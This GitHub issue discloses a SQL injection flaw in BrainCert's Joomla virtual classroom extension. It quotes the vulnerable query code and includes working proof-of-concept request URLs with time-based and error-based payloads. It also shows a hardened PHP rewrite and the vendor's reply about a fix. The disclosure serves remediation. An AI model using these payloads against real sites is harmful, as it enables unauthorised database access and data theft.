braincert / Online-Virtual-Classroom

Easily integrate BrainCert Virtual classroom in your website, CMS, LMS, or app.
https://www.braincert.com

SQL Injection in Joomla Plugin for Virtual Classroom #2

Open k4k4r07 opened 1 year ago

k4k4r07 commented 1 year ago

Description

SQL Injection is an attack technique used to exploit applications that construct SQL statements from user-supplied input. When successful, the attacker is able to change the logic of SQL statements executed against the database.

Structured Query Language (SQL) is a specialized programming language for sending queries to databases. The SQL programming language is both an ANSI and an ISO standard, though many database products supporting SQL do so with proprietary extensions to the standard language. Applications often use user-supplied data to create SQL statements. If an application fails to properly construct SQL statements it is possible for an attacker to alter the statement structure and execute unplanned and potentially hostile commands. When such commands are executed, they do so under the context of the user specified by the application executing the statement. This capability allows attackers to gain control of all database resources accessible by that user, up to and including the ability to execute commands on the hosting system.

The extension for Joomla at https://extensions.joomla.org/extension/online-virtual-classroom/ contains an SQL injection vulnerability.

Root Cause Analysis

The file administrator/controller.php contains the following code at line 74:

$query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";

As can be seen, the variable $value is injected without any sanitization into the SQL query, which is then executed, causing the SQL injection.

Similarly, there are other instances in the same file vulnerable to SQL injection:

line 95:  $query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";
line 321: $row = 'SELECT class_id FROM #__virtualclassroom_acl WHERE group_id="'.$gid.'"';

CVSS Score: 8.8 (High)

Steps To Reproduce

  1. Install Joomla 3.
  2. Log in to the admin panel with any user.
  3. Install the extension.
  4. Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),sleep(10)),7062)--%20mIHZ and the server will execute the sleep query for 10 seconds, confirming the SQL injection.

[screenshot: MicrosoftTeams-image (1)]

  5. Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),database()),7062)--%20mIHZ and the server will execute the database() query and disclose the database name in the response.

[screenshot: MicrosoftTeams-image]

  6. Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),version()),7062)--%20mIHZ and the server will execute the version() query and disclose the database version in the response.

[screenshot: MicrosoftTeams-image (2)]

Similarly, an attacker can dump the entire database using this vulnerability.

Video POC

https://github.com/braincert/Online-Virtual-Classroom/assets/51406427/51334160-d4b0-4c7d-9b81-90b0dcf4212c

The vulnerability was discovered in collaboration with @SivaPothuluru-Sajja
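The vulnerable concatenation from the report beside a hardened form of the same task, as an added example: this is not code from the braincert extension or from the reporter. It assumes Joomla 3 APIs (JControllerLegacy, JFactory::getDbo(), JInput, Joomla\Utilities\ArrayHelper); the method names, loop bodies and redirect are illustrative, since the issue quotes only the query strings, the task name unpublishuser and the cid[] parameter.

```php
<?php
// Added example, not code from braincert/Online-Virtual-Classroom.
// Assumes Joomla 3: JControllerLegacy, JFactory, JInput, Joomla\Utilities\ArrayHelper.
// Method bodies beyond the quoted query strings are illustrative.
defined('_JEXEC') or die;

use Joomla\Utilities\ArrayHelper;

class VirtualclassroomController extends JControllerLegacy
{
    /**
     * The pattern reported at administrator/controller.php line 74: the raw
     * cid[] value is concatenated into the SQL text. A value such as
     *   309' AND GTID_SUBSET(CONCAT(...,sleep(10)),7062)-- mIHZ
     * closes the quoted literal, appends attacker SQL and comments out the
     * trailing quote, which is exactly what the PoC requests in the issue do.
     */
    public function unpublishuserVulnerable()
    {
        $db  = JFactory::getDbo();
        $cid = $this->input->get('cid', array(), 'array');

        foreach ($cid as $value) {
            // Same shape as the line quoted in the report.
            $query = "select id from #__virtualclassroom_teacher where user_id='" . $value . "' ";
            $db->setQuery($query);
            $id = $db->loadResult();
            // ... unpublish logic (illustrative, not in the issue)
        }
    }

    /**
     * Hardened form. user_id is an integer key, so every cid[] element is
     * cast to int before it reaches SQL; the query builder with quoteName()
     * keeps identifiers and values separated. Either measure alone defeats
     * the payloads in the report; using both makes the intent explicit.
     */
    public function unpublishuser()
    {
        $db = JFactory::getDbo();

        // 'array' filter guarantees an array; toInteger() coerces each element,
        // so "309' AND GTID_SUBSET(...)" becomes 309 and the injected tail is lost.
        $cid = ArrayHelper::toInteger($this->input->get('cid', array(), 'array'));

        foreach ($cid as $userId) {
            $query = $db->getQuery(true)
                ->select($db->quoteName('id'))
                ->from($db->quoteName('#__virtualclassroom_teacher'))
                ->where($db->quoteName('user_id') . ' = ' . (int) $userId);

            $db->setQuery($query);
            $id = (int) $db->loadResult();

            if ($id === 0) {
                continue; // no teacher row for this user id
            }
            // ... unpublish logic using $id (illustrative, not in the issue)
        }

        $this->setRedirect('index.php?option=com_virtualclassroom');
    }

    /**
     * The line-321 pattern (group_id = "$gid") handled for a value that may
     * legitimately be a string: $db->quote() escapes embedded quotes and
     * backslashes for the active driver instead of trusting the input.
     */
    private function classIdsForGroup($gid)
    {
        $db = JFactory::getDbo();

        $query = $db->getQuery(true)
            ->select($db->quoteName('class_id'))
            ->from($db->quoteName('#__virtualclassroom_acl'))
            ->where($db->quoteName('group_id') . ' = ' . $db->quote($gid));

        $db->setQuery($query);

        return $db->loadColumn();
    }
}
```

The integer cast is the decisive control for cid[] because the column is a numeric key: once the value is an int there is no quoting context left for the attacker to escape. For columns that genuinely hold strings, $db->quote() is the minimum; a check that the caller is actually allowed to unpublish that user belongs in front of either query, but the issue does not describe the component's permission model, so it is not shown here.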

braincert commented 1 year ago

Thanks for reporting. The Joomla plugin has been updated and posted here: https://extensions.joomla.org/extension/online-virtual-classroom/